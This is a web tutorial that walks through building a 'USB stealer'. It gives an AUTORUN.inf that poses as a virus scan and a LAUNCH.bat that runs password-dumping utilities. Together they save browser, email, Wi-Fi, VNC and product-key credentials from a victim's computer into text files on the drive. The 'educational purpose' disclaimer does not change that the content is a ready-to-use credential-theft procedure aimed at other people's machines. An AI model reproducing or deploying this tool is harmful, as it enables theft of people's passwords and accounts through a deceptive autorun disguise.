WARNING: THIS METHOD IS ONLY FOR EDUCATIONAL PURPOSE AND YOU ARE RESPONSIBLE YOURSELF FOR EVERY TASK YOU PERFORM!
How to make USB stealer? Well, You might be seeing many cool password-stealing tricks in movies. Stealing data just by placing a USB in a computer is one of the cool and easy tricks you might have seen. If you had dreamt of making such a stealing device then you are at the right place where your dream will come true.
In this tutorial, for making a USB password stealer or data stealer we will create a “bat” file at first and put a simple piece of code in our USB drive. After that, we will download some .exe program and put all of them in the USB drive. Let’s discuss how to make USB stealer in detail.
- Well, How to make USB stealer?
- Requirements for creating USB stealer:
- Step 1: First of all open your notepad or Wordpad.
- Step 2: Save the above statement as AUTORUN.inf and copy this in your USB.
- Step 3: Open a new notepad. copy and paste the statements given below
- Step 4: Save as LAUNCH.bat and copy this file in your USB.
- Step 5: Now we need to download .exe files mentioned in step 4 as “filename.exe” [e.g mspass.exe] click here to download
- Step 6: Extract the files you downloaded to your desktop and copy all the .exe files to your USB.
- How to use USB stealer?
Well, How to make USB stealer?
Requirements for creating USB stealer:
- A USB drive (minimum 8gb)
- piece of code (we will provide)
Step 1: First of all open your notepad or Wordpad.
Note: This step is currently not needed just do copy and paste the code given below.
[autorun] open=launch.bat ACTION=perform a Virus Scan
Step 2: Save the above statement as AUTORUN.inf and copy this in your USB.
Step 3: Open a new notepad. copy and paste the statements given below
start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start PasswordFox.exe /stext passwordfox.txt start OperaPassView.exe /stext OperaPassView.txt start ChromePass.exe /stext ChromePass.txt
Step 4: Save as LAUNCH.bat and copy this file in your USB.
Additional: If you want to create more type of file stealer just do copy and paste the statements given below and save as LAUNCH.bat
start Dialupass.exe /stext Dialupass.txt start netpass.exe /stexth netpass.txt start WirelessKeyView.exe /stext WirelessKeyView.txt start BulletsPassView.exe /stext BulletsPassView.txt start VNCPassView.exe /stext VNCPassView.txt start OpenedFilesView.exe /stext OpenedFilesView.txt start ProduKey.exe /stext ProduKey.txt start USBDeview.exe /stext USBDeview.txt
Step 5: Now we need to download .exe files mentioned in step 4 as “filename.exe” [e.g mspass.exe] click here to download
Step 6: Extract the files you downloaded to your desktop and copy all the .exe files to your USB.
BOOM !!! Now your USB password stealer or USB stealer is ready to use.
How to use USB stealer?
- Remove and re-insert your USB
- Click on the bat file
- Go to my computer and locate your USB drive
- Open it and now you will now see some text files. If you open them you will see usernames and passwords.
Every tutorial you find in here is 100% working without any doubt. We have tested every tutorial before we publish it on our site. This is an authentic website. If you enjoy our tutorial don’t forget to share with your friends and support us. Stay updated for such awesome tricks.